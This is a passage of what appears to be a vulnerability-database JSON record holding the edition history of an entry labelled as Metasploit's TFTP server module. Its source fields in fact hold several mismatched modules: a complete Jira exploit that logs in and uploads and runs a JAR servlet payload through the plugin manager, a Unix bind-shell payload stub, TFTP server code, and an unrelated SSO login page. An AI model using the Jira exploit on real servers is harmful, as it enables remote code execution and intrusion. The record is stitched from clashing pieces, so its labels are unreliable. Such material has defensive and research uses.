https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Atlassian Jira Authenticated Upload Code Execution',\n 'Description' => %q{\n This module can be used to execute a payload on Atlassian Jira via\n the Universal Plugin Manager(UPM). The module requires valid login\n credentials to an account that has access to the plugin manager.\n The payload is uploaded as a JAR archive containing a servlet using\n a POST request against the UPM component. The check command will\n test the validity of user supplied credentials and test for access\n to the plugin manager.\n },\n 'Author' => 'Alexander Gonzalez(dubfr33)',\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-windows-system/'],\n ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/install-the-atlassian-sdk-on-a-linux-or-mac-system/'],\n ['URL', 'https://developer.atlassian.com/server/framework/atlassian-sdk/create-a-helloworld-plugin-project/']\n ],\n 'Platform' => %w[java],\n 'Targets' =>\n [\n ['Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n }\n ]\n ],\n 'DisclosureDate' => 'Feb 22 2018'))\n\n register_options(\n [\n Opt::RPORT(2990),\n OptString.new('HttpUsername', [true, 'The username to authenticate as', 'admin']),\n OptString.new('HttpPassword', [true, 'The password for the specified username', 'admin']),\n OptString.new('TARGETURI', [true, 'The base URI to Jira', '/jira/'])\n ])\n end\n\n def check\n login_res = query_login\n if login_res.nil?\n vprint_error('Unable to access the web application!')\n return CheckCode::Unknown\n end\n return CheckCode::Unknown unless login_res.code == 200\n @session_id = get_sid(login_res)\n @xsrf_token = login_res.get_html_document.at('meta[@id=\"atlassian-token\"]')\n return CheckCode::Unknown if @xsrf_token.nil? || @xsrf_token['content'].nil?\n @xsrf_token = @xsrf_token['content']\n\n auth_res = do_auth\n good_sid = get_sid(auth_res)\n good_cookie = \"atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}\"\n res = query_upm(good_cookie)\n if res.nil?\n vprint_error('Unable to access the web application!')\n return CheckCode::Unknown\n elsif res.code == 200\n return Exploit::CheckCode::Appears\n else\n vprint_status('Something went wrong, make sure host is up and options are correct!')\n vprint_status(\"HTTP Response Code: #{res.code}\")\n return Exploit::CheckCode::Unknown\n end\n end\n\n def exploit\n unless access_login?\n fail_with(Failure::Unknown, 'Unable to access the web application!')\n end\n print_status('Retrieving Session ID and XSRF token...')\n auth_res = do_auth\n good_sid = get_sid(auth_res)\n good_cookie = \"atlassian.xsrf.token=#{@xsrf_token}; #{good_sid}\"\n res = query_for_upm_token(good_cookie)\n if res.nil?\n fail_with(Failure::Unknown, 'Unable to retrieve UPM token!')\n end\n upm_token = res.headers['upm-token']\n upload_exec(upm_token, good_cookie)\n end\n\n # Upload, execute, and remove servlet\n def upload_exec(upm_token, good_cookie)\n contents = ''\n name = Rex::Text.rand_text_alpha(8..12)\n\n atlassian_plugin_xml = %Q{\n <atlassian-plugin name=\"#{name}\" key=\"#{name}\" plugins-version=\"2\">\n <plugin-info>\n <description></description>\n <version>1.0</version>\n <vendor name=\"\" url=\"\" />\n\n <param name=\"post.install.url\">/plugins/servlet/metasploit/PayloadServlet</param>\n <param name=\"post.upgrade.url\">/plugins/servlet/metasploit/PayloadServlet</param>\n\n </plugin-info>\n\n <servlet name=\"#{name}\" key=\"metasploit.PayloadServlet\" class=\"metasploit.PayloadServlet\">\n <description>\"#{name}\"</description>\n <url-pattern>/metasploit/PayloadServlet</url-pattern>\n </servlet>\n\n </atlassian-plugin>\n }\n\n # Generates .jar file for upload\n zip = payload.encoded_jar\n zip.add_file('atlassian-plugin.xml', atlassian_plugin_xml)\n\n servlet = MetasploitPayloads.read('java', '/metasploit', 'PayloadServlet.class')\n zip.add_file('/metasploit/PayloadServlet.class', servlet)\n\n contents = zip.pack\n\n boundary = rand_text_numeric(27)\n\n data = \"--#{boundary}\\r\\nContent-Disposition: form-data; name=\\\"plugin\\\"; \"\n data << \"filename=\\\"#{name}.jar\\\"\\r\\nContent-Type: application/x-java-archive\\r\\n\\r\\n\"\n data << contents\n data << \"\\r\\n--#{boundary}--\"\n\n print_status(\"Attempting to upload #{name}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'rest/plugins/1.0/'),\n 'vars_get' =>\n {\n 'token' => \"#{upm_token}\"\n },\n 'method' => 'POST',\n 'data' => data,\n 'headers' =>\n {\n 'Content-Type' => 'multipart/form-data; boundary=' + boundary,\n 'Cookie' => good_cookie.to_s\n }\n }, 25)\n\n unless res && res.code == 202\n print_status(\"Error uploading #{name}\")\n print_status(\"HTTP Response Code: #{res.code}\")\n print_status(\"Server Response: #{res.body}\")\n return\n end\n\n print_status(\"Successfully uploaded #{name}\")\n print_status(\"Executing #{name}\")\n Rex::ThreadSafe.sleep(3)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/metasploit/PayloadServlet'),\n 'method' => 'GET',\n 'cookie' => good_cookie.to_s\n })\n\n print_status(\"Deleting #{name}\")\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, \"rest/plugins/1.0/#{name}-key\"),\n 'method' => 'DELETE',\n 'cookie' => good_cookie.to_s\n })\n end\n\n def access_login?\n res = query_login\n if res.nil?\n fail_with(Failure::Unknown, 'Unable to access the web application!')\n end\n return false unless res && res.code == 200\n @session_id = get_sid(res)\n @xsrf_token = res.get_html_document.at('meta[@id=\"atlassian-token\"]')\n return false if @xsrf_token.nil? || @xsrf_token['content'].nil?\n\n @xsrf_token = @xsrf_token['content']\n return true\n end\n\n # Sends GET request to login page so the HTTP response can be used\n def query_login\n send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'))\n end\n\n # Queries plugin manager to verify access\n def query_upm(good_cookie)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, 'plugins/servlet/upm'),\n 'method' => 'GET',\n 'cookie' => good_cookie.to_s\n })\n end\n\n # Queries API for response containing upm_token\n def query_for_upm_token(good_cookie)\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, 'rest/plugins/1.0/'),\n 'method' => 'GET',\n 'cookie' => good_cookie.to_s\n })\n end\n\n # Authenticates to webapp with user supplied credentials\n def do_auth\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path.to_s, 'login.jsp'),\n 'method' => 'POST',\n 'cookie' => \"atlassian.xsrf.token=#{@xsrf_token}; #{@session_id}\",\n 'vars_post' => {\n 'os_username' => datastore['HttpUsername'],\n 'os_password' => datastore['HttpPassword'],\n 'os_destination' => '',\n 'user_role' => '',\n 'atl_token' => '',\n 'login' => 'Log+In'\n }\n })\n end\n\n # Finds SID from HTTP response headers\n def get_sid(res)\n if res.nil?\n return '' if res.blank?\n end\n res.get_cookies.scan(/(JSESSIONID=\\w+);*/).flatten[0] || ''\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-05T10:04:14", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-05T14:29:15", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-10-05T14:29:15"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:956983263496537696", "KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2251-1"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1945-1:55523"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876876", "OPENVAS:1361412562310876871"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}, {"type": "msupdate", "idList": ["MS:18552C40-7E36-4F15-960A-9717A4912AF1", "MS:2CA3D95F-1ECB-4850-AEB4-AFB63CD6374A", "MS:E08D28EF-D685-412C-B0BC-8CC26BF899C3", "MS:9668152F-78A1-44F9-A229-38E86189703A", "MS:16216817-6043-4587-A803-9B3A9F3A58CC"]}], "modified": "2019-10-05T14:29:15"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-05T14:29:15", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "ffc44867296a30f1a51496c92c2b3ca9", "type": "metasploit", "bulletinFamily": "exploit", "title": "Unix Command Shell, Bind TCP (stub)", "description": "Listen for a connection and spawn a command shell (stub only, no payload)\n", "published": "2017-12-28T22:21:37", "modified": "2017-12-28T22:21:37", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-06T15:48:11", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 3.1, "vector": "NONE", "modified": "2019-10-06T15:48:11"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2260-1", "OPENSUSE-SU-2019:2251-1"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1946-1:BCAEB", "DEBIAN:DLA-1945-1:55523"]}, {"type": "kitploit", "idList": ["KITPLOIT:956983263496537696", "KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876876", "OPENVAS:1361412562310876871"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}], "modified": "2019-10-06T15:48:11"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/payloads/singles/cmd/unix/bind_stub.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/handler/bind_tcp'\nrequire 'msf/base/sessions/command_shell'\nrequire 'msf/base/sessions/command_shell_options'\n\nmodule MetasploitModule\n\n CachedSize = 0\n\n include Msf::Payload::Single\n include Msf::Sessions::CommandShellOptions\n\n def initialize(info = {})\n super(merge_info(info,\n 'Name' => 'Unix Command Shell, Bind TCP (stub)',\n 'Description' => 'Listen for a connection and spawn a command shell (stub only, no payload)',\n 'Author' => 'hdm',\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Handler' => Msf::Handler::BindTcp,\n 'Session' => Msf::Sessions::CommandShell,\n 'PayloadType' => 'cmd_bind_stub',\n 'RequiredCmd' => '',\n 'Payload' =>\n {\n 'Offsets' => { },\n 'Payload' => ''\n }\n ))\n end\n\n #\n # Generate an empty payload\n #\n def generate\n ''\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-06T15:48:11", "differentElements": ["description", "modified", "published", "sourceData", "sourceHref", "title"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-06T18:01:24", "history": [], "viewCount": 46, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-10-06T18:01:24"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2260-1", "OPENSUSE-SU-2019:2251-1"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1946-1:BCAEB", "DEBIAN:DLA-1945-1:55523"]}, {"type": "kitploit", "idList": ["KITPLOIT:956983263496537696", "KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876876", "OPENVAS:1361412562310876871"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}], "modified": "2019-10-06T18:01:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-06T18:01:24", "differentElements": ["sourceData"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "1668b924ad220a5441b80140fbe024e3", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-11T18:07:27", "history": [], "viewCount": 46, "enchantments": {"score": {"value": 2.4, "vector": "NONE", "modified": "2019-10-06T18:01:24"}, "dependencies": {"references": [{"type": "suse", "idList": ["OPENSUSE-SU-2019:2260-1", "OPENSUSE-SU-2019:2251-1"]}, {"type": "jakearchibald", "idList": ["JAKEARCHIBALD:AE099BFD5E48A6EC3AAB5E2D141B3F6D"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1946-1:BCAEB", "DEBIAN:DLA-1945-1:55523"]}, {"type": "kitploit", "idList": ["KITPLOIT:956983263496537696", "KITPLOIT:751009970245130177", "KITPLOIT:1645410330277795780"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154736", "PACKETSTORM:154737"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D4A345D9C17D031176D922F3B0EA21FC"]}, {"type": "threatpost", "idList": ["THREATPOST:66DDC23E145C0FDF5849934530BC1CD9", "THREATPOST:0626AE531D93E249C5B991D156113554"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:4F29FA6ED95FBACB0B013CBB4273BE5D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:5757EE09BE22E4808719C348402D3F43"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310876876", "OPENVAS:1361412562310876871"]}, {"type": "mskb", "idList": ["KB4516065", "KB4516033"]}, {"type": "cve", "idList": ["CVE-2019-15766"]}], "modified": "2019-10-06T18:01:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n<html>\n\t<head>\n\t\t<title>sso login check</title>\n\t\t\n\t\t<meta charset=\"utf-8\"/>\n\t\t<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" />\n\t\t<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\n\t\t<meta http-equiv=\"CACHE-CONTROL\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"PRAGMA\" content=\"NO-CACHE\" />\n\t\t<meta http-equiv=\"EXPIRES\" content=\"0\" />\n\t</head>\n \t<body>\n \t<script src=\"http://127.0.0.1:12381/auth\" language=\"javascript\" type=\"text/javascript\"></script> \n\t\t<script language=\"javascript\" type=\"text/javascript\">\n\t\t\tfunction getOrigURLParamValue() \n\t\t\t{\n\t\t\t\tvar orig_url_param = 'orig_url=';\n\t\t\t\tvar decodedUrlParameters = decodeURIComponent(location.search);\n\t\t\t\tvar decodedOrigParam = (new RegExp(orig_url_param + '.*').exec(decodedUrlParameters)||[,\"\"])[0].replace(orig_url_param, '').replace(/\\+/g, '%20')||null;\n\t\t\t\tvar encodedOrigParam = encodeURIComponent(decodedOrigParam);\n\n\t\t\t\t//console.log('Decoded URL Params: ' + decodedUrlParameters);\n\t\t\t\t//console.log('decodedOrigParam: ' + decodedOrigParam);\n\t\t\t\t//console.log('encodedOrigParam: ' + encodedOrigParam);\n\n\t\t\t\treturn encodedOrigParam;\n\n\t\t\t}\n\n\t\t\tfunction empty(str)\n\t\t\t{\t\n\t\t\t\treturn !str || !/[^\\s]+/.test(str);\n\t\t\t}\n\t\t\t\n\t\t\tvar encodedOrigUrl = getOrigURLParamValue();\n\t\t\t\n\t\t\ttry\n\t\t\t{\n\t\t\t\tif(typeof(gCtchLogonInfo) !== 'undefined')\n\t\t\t\t{\t \t\n\t\t\t\t\tvar modified_redirect_url = \"https://\" + window.location.hostname +'/EUP/transparent_login/?orig_url=' + encodedOrigUrl + '&winUserId=' +gCtchLogonInfo.winUserId ;\n\t\t\t\t\tif (!empty(gCtchLogonInfo.orgName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&orgName=\",gCtchLogonInfo.orgName);\n\t\t\t\t\t}\n\t\t\t\t\tif (!empty(gCtchLogonInfo.userName))\n\t\t\t\t\t{\n\t\t\t\t\t\tmodified_redirect_url = modified_redirect_url.concat(\"&userName=\",gCtchLogonInfo.userName);\n\t\t\t\t\t}\n\t\t\t\t\t\n\t\t\t\t\tdocument.location.href = modified_redirect_url;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url=' + encodedOrigUrl;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcatch(e)\n\t\t\t{\n\t\t\t\tdocument.location.href = \"https://\" + window.location.hostname + '/EUP/login?orig_url='+ encodedOrigUrl;\n\t\t\t}\n\t\t</script> \n\n\t</body> \n</html>\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-11T18:07:27", "differentElements": ["sourceData"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "de71383e686baf40dc661000113b42a5", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-11T19:58:40", "history": [], "viewCount": 46, "enchantments": {"score": {"value": 1.6, "vector": "NONE", "modified": "2019-10-11T19:58:40"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:C04394A6F48EB98804740BF71AB36B4C", "THREATPOST:58D26C239FA809E5AFB59B913C7C2F2D"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B"]}, {"type": "debian", "idList": ["DEBIAN:DLA-1956-1:B9C38", "DEBIAN:DLA-1954-1:CF381"]}, {"type": "symantec", "idList": ["SMNTC-110381"]}, {"type": "exploitdb", "idList": ["EDB-ID:47491"]}, {"type": "kitploit", "idList": ["KITPLOIT:7842853011213233978"]}, {"type": "cve", "idList": ["CVE-2015-9479", "CVE-2019-17320", "CVE-2019-1333", "CVE-2019-1376", "CVE-2019-1375", "CVE-2019-1328", "CVE-2019-1365", "CVE-2019-1070", "CVE-2019-1329", "CVE-2019-1313"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:86C26266774161075BFD1BBE158CE9EE"]}], "modified": "2019-10-11T19:58:40"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'rex/proto/tftp'\nrequire 'tmpdir'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::TFTPServer\n include Msf::Auxiliary::Report\n\n def initialize\n super(\n 'Name' => 'TFTP File Server',\n 'Description' => %q{\n This module provides a TFTP service\n },\n 'Author' => [ 'jduck', 'todb' ],\n 'License' => MSF_LICENSE,\n 'Actions' =>\n [\n [ 'Service' ]\n ],\n 'PassiveActions' =>\n [\n 'Service'\n ],\n 'DefaultAction' => 'Service'\n )\n\n register_options(\n [\n OptAddress.new('SRVHOST', [ true, \"The local host to listen on.\", '0.0.0.0' ]),\n OptPort.new('SRVPORT', [ true, \"The local port to listen on.\", 69 ]),\n OptPath.new('TFTPROOT', [ true, \"The TFTP root directory to serve files from\", Dir.tmpdir ]),\n OptPath.new('OUTPUTPATH', [ true, \"The directory in which uploaded files will be written.\", Dir.tmpdir ])\n ])\n end\n\n def srvhost\n datastore['SRVHOST'] || '0.0.0.0'\n end\n\n def srvport\n datastore['SRVPORT'] || 69\n end\n\n def run\n print_status(\"Starting TFTP server on #{srvhost}:#{srvport}...\")\n\n @tftp = Rex::Proto::TFTP::Server.new(\n srvport,\n srvhost,\n {}\n )\n\n @tftp.set_tftproot(datastore['TFTPROOT'])\n print_status(\"Files will be served from #{datastore['TFTPROOT']}\")\n\n @tftp.set_output_dir(datastore['OUTPUTPATH'])\n print_status(\"Uploaded files will be saved in #{datastore['OUTPUTPATH']}\")\n\n # Individual virtual files can be served here -\n #@tftp.register_file(\"ays\", \"A\" * 2048) # multiple of 512 on purpose\n\n @tftp.start\n add_socket(@tftp.sock)\n\n # Wait for finish..\n while @tftp.thread.alive?\n sleep 3\n end\n\n vprint_status(\"Stopping TFTP server\")\n @tftp.stop\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-11T19:58:40", "differentElements": ["sourceData"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/SERVER/TFTP", "hash": "3d89a3b5af133f1627d72096317b7656", "type": "metasploit", "bulletinFamily": "exploit", "title": "TFTP File Server", "description": "This module provides a TFTP service\n", "published": "2010-07-08T23:34:33", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-30T11:18:56", "history": [], "viewCount": 46, "enchantments": {"score": {"value": 5.2, "vector": "NONE", "modified": "2019-10-30T11:18:56"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:12C7393B970A5A1BA295EC228437B2CF"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:70B3C77A2DC5965EB28755E5F9FD9BFD"]}, {"type": "mskb", "idList": ["KB2986475", "KB2961522", "KB2936871", "KB2905616", "KB2866475", "KB4524149", "KB4520004"]}, {"type": "exploitdb", "idList": ["EDB-ID:47561", "EDB-ID:47562"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2408-1"]}, {"type": "cve", "idList": ["CVE-2018-18931", "CVE-2019-6842", "CVE-2011-2538", "CVE-2019-15683", "CVE-2019-9926", "CVE-2019-9757", "CVE-2019-0210"]}, {"type": "postgresql", "idList": ["POSTGRESQL:CVE-2019-10208"]}], "modified": "2019-10-30T11:18:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/server/tftp.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-30T11:18:56", "differentElements": ["sourceData"], "edition": 39}], "viewCount": 46, "enchantments": {"score": {"value": 3.2, "vector": "NONE", "modified": "2019-10-30T14:36:53"}, "dependencies": {"references": [{"type": "redhat", "idList": ["RHSA-2019:3255", "RHSA-2019:3253"]}, {"type": "threatpost", "idList": ["THREATPOST:C94628D82D410DC578B7112E6EDC118E", "THREATPOST:12C7393B970A5A1BA295EC228437B2CF"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:70B3C77A2DC5965EB28755E5F9FD9BFD"]}, {"type": 